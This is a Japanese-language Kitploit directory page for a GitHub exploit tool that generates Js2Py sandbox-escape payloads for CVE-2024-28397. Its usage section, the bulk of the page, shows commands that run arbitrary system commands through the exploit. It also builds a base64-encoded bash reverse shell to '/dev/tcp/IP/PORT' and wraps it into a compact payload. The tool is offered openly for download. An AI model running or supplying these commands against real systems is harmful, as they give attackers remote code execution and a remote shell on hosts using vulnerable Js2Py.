Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/y0naldez/cve-2024-28397-js2py-rce
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用コマンド&コントロールシェルコード生成
GitHuby0naldez/cve-2024-28397-js2py-rce

CVE-2024-28397-Js2Py-RCE

リポジトリを見る
3ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-28397 - Js2Py サンドボックスエスケープペイロードジェネレーター

このスクリプトは、Python内部がオブジェクトラッパーを通じて露出している脆弱な環境で、Js2Pyによって評価可能なJavaScriptペイロードを生成します。

使い方

基本的なコマンド実行:

root@kitploit:~
python3 cve-2024-28397.py -c "id"

コンパクトな1行ペイロードを生成:

root@kitploit:~
python3 cve-2024-28397.py -c "whoami" --compact

Base64を使ったリバースシェル

Base64ペイロードを生成:

root@kitploit:~
echo 'bash -i >& /dev/tcp/IP/PORT 0>&1' | base64 -w0

Js2Pyペイロードを生成:

root@kitploit:~
python3 cve-2024-28397.py -c "bash -c 'echo BASE64_OUTPUT | base64 -d | bash'" --compact

BASE64_OUTPUT を最初の手順で生成したBase64文字列に置き換えてください。

ツールをダウンロード